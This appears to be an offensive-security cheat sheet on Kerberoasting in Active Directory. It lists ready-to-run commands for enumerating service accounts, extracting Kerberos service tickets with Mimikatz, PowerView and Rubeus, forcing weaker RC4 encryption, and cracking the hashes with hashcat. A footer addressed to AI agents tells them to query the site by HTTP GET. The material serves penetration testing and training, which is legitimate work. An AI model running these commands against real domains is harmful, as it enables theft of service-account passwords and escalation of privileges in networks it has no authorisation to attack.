# Windows

## **Semi Manual method**

```powershell
# Enumerating SPNs with setspn.exe
C:\> setspn.exe -Q */*

# Requesting tickets and loading them into memory 
# Targeting a Single User
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\pow> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.domain.local:1433"

# Extracting Tickets from Memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export

# Preparing the Base64 Blob for Cracking
echo "<base64 blob>" |  tr -d \\n

# Placing the Output into a File as .kirbi
cat encoded_file | base64 -d > sqldev.kirbi

# Using kirbi2john.py tool to extract the Kerberos ticket from the TGS file.
# too link : <https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py>
python2.7 kirbi2john.py sqldev.kirbi

# Modifiying crack_file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

# Cracking the Hash with Hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
```

## **Automated**

### [PowerView](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1)

```bash
# Using PowerView to Extract TGS Tickets
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname

# Using PowerView to Target a Specific User
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Exporting All Tickets to a CSV File
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\output_tgs.csv -NoTypeInformation

# Then We can crack using hashcat
```

### [Rubeus](https://github.com/GhostPack/Rubeus)

```bash
# Using the /stats Flag
PS C:\> .\Rubeus.exe kerberoast /stats

# Using the /nowrap Flag
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# RC4 is easier to crack than AES or other encryption algorithms
# Using the /tgtdeleg Flag to request onlt RC4 encrypted tickets
PS C:\> .\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://strange-1.gitbook.io/notes/active-directory/kerberoasting/windows.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.